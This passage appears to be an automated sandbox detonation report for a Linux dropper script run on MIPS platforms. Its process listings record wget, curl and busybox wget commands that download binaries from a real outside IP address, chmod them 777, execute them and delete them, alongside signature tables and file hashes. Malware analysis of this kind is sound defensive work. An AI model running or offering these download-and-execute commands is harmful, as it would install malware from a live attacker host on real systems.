/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
memory/868-1-0xb677a000-0xb678b044-memory.dmp
memory/869-2-0xb6792000-0xb67a3044-memory.dmp
memory/869-3-0xb6763000-0xb6774044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:56
Platform
debian9-mipsbe-20240611-en
Max time kernel
88s
Max time network
90s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:55
Platform
debian9-mipsel-20240729-en
Max time kernel
62s
Max time network
64s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
